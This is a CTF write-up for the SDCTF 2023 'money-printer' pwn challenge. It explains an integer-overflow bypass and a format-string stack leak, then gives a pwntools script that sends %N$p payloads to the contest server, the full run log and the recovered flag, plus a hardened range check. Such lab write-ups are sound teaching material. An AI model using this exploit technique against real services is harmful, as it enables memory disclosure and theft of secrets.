San Diego CTF 2023 write up
Pwn - money-printer
A turtle without it's shell is a sad sight to see
SDCTF 2023
San Diego CTF 2023
ctf.sdc.tf
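Connecting to the given nc server and running it produces the result below.
As the challenge name money_print suggests, it is a system for giving and receiving money. If I ask for 20 dollars, the other side subtracts 20 dollars from the 100 dollars it holds and gives them to me. This 'repeats' until it reaches 0 dollars.
I was reminded of a buffer overflow challenge I solved earlier, so I tried entering a very large number.
The program left the loop, said that money had been printed out of thin air, and asked whether I had anything to say to the audience(?).
Once the value goes past 2147483647, the maximum of an int, dollars becomes negative. Asking for an amount of money that exceeds the int maximum lets you get out of the loop.
It looks like the flag can be found using this. Using this vulnerability, 8 bytes of the flag are leaked. Repeating this yields the whole flag.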
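The wraparound described above can be modelled offline in 32-bit arithmetic, next to a range check that rejects the same input. This is an added example, not code from the original post or from the challenge binary; the upper-bound-only check and the names `withdraw_unchecked`, `withdraw_checked` and `session_end_state` are assumptions chosen to match the behaviour the post reports.

```python
import ctypes

INT_MAX = 2**31 - 1  # 2147483647, the largest signed 32-bit value


def to_int32(value):
    """Truncate a Python int to a signed 32-bit C int (two's-complement wrap)."""
    return ctypes.c_int32(value).value


def withdraw_unchecked(dollars, requested):
    """Assumed model of the service: the request is stored in an int and
    only compared against the balance from above."""
    want = to_int32(requested)
    if want > dollars:
        return dollars, "rejected"
    # A negative 'want' passes the check and the subtraction wraps as well.
    return to_int32(dollars - want), "granted"


def withdraw_checked(dollars, requested):
    """Hardened form: validate the full range before narrowing to an int."""
    if not 0 < requested <= dollars:
        return dollars, "rejected"
    return dollars - requested, "granted"


def session_end_state(requests, withdraw):
    """Replay a list of requests against a 100-dollar balance."""
    dollars = 100
    for requested in requests:
        dollars, _ = withdraw(dollars, requested)
        if dollars <= 0:  # the loop the post describes ends here
            break
    return dollars


if __name__ == "__main__":
    for amount in (20, INT_MAX + 1):
        print(amount, withdraw_unchecked(100, amount), withdraw_checked(100, amount))
```
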
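[Python code that repeatedly enters a number exceeding the int maximum]
```python
#!/usr/bin/env python3
import sys

from pwn import *

flag = ''
i = 10  # positional argument index; %10$p returns the first 8 bytes of the flag

while True:
    # No arguments: connect to the remote service; otherwise run the local binary.
    if len(sys.argv) == 1:
        p = remote('money.sdc.tf', 1337)  # nc turtle.sdc.tf 1337
    else:
        p = process('./money-printer')

    money = 2147483648  # int maximum + 1
    payload = f'%{i}$p'  # print the i-th argument as a pointer-sized hex value

    # Answer the "how many of them do you want?" prompt.
    data = p.recvuntil(b'\n').rstrip().decode()
    print(data)
    print(str(money))
    p.sendline(str(money).encode())

    # Wait for the "anything you would like to say" prompt, then send the payload.
    data = p.recvuntil(b'?\n').rstrip().decode()
    print(data)
    print(payload)
    p.sendline(payload.encode())

    # "wow you said: 0x..." -> pack the value little-endian to recover the bytes.
    data = p.recvuntil(b'\n').rstrip().decode()
    print(data)
    flag += p64(int(data.split(' ')[-1], 16)).decode()
    if '}' in flag or '\x00' in flag:
        flag = flag.rstrip('\x00')
        break

    data = p.recvuntil(b'\n').rstrip().decode()
    print(data)
    data = p.recvuntil(b'\n').rstrip().decode()
    print(data)
    p.close()
    i += 1

# The last leaked word ends before the closing brace, so add it.
if '}' not in flag:
    flag += '}'
print(flag)
```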
[Execution result]
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of C:\Users\a9034\.cache\.pwntools-cache-3.10\update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[*] A newer version of pwntools is available on pypi (4.8.0 --> 4.9.0).
Update with: $ pip install -U pwntools
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%10$p
wow you said: 0x34647b6674636473
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%11$p
wow you said: 0x665f7530795f6e6d
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%12$p
wow you said: 0x435f345f446e7530
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%13$p
wow you said: 0x304d345f597a3472
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%14$p
wow you said: 0x4d5f66305f374e75
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%15$p
wow you said: 0x79336e30
sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y}
sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y}
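The step from the `%p` replies to readable text can be reproduced offline from the output above. This is an added example, not part of the original post; the function names are illustrative, the six reply lines are copied from the run shown above, and little-endian byte order is assumed, as in the script's `p64()` call.

```python
import re
import struct

# Replies to %10$p .. %15$p, copied from the run output shown above.
SESSION_LINES = [
    "wow you said: 0x34647b6674636473",
    "wow you said: 0x665f7530795f6e6d",
    "wow you said: 0x435f345f446e7530",
    "wow you said: 0x304d345f597a3472",
    "wow you said: 0x4d5f66305f374e75",
    "wow you said: 0x79336e30",
]

# glibc prints a null pointer as "(nil)" instead of a hex value.
LEAK_RE = re.compile(r"wow you said: (0x[0-9a-fA-F]+|\(nil\))")


def word_to_bytes(token):
    """One %p reply is an 8-byte word; return its bytes in memory order."""
    value = 0 if token == "(nil)" else int(token, 16)
    return struct.pack("<Q", value)


def decode_leak(lines):
    """Join the leaked words and stop at the first NUL byte."""
    recovered = bytearray()
    for line in lines:
        match = LEAK_RE.search(line)
        if match is None:
            continue  # prompts and banners carry no leaked data
        chunk = word_to_bytes(match.group(1))
        if b"\x00" in chunk:
            recovered += chunk.split(b"\x00", 1)[0]
            break
        recovered += chunk
    return recovered.decode("ascii", errors="replace")


if __name__ == "__main__":
    print(decode_leak(SESSION_LINES))
```

The decoded text stops after `M0n3y` because the last word holds only four non-zero bytes, which is why the script appends the closing `}` itself.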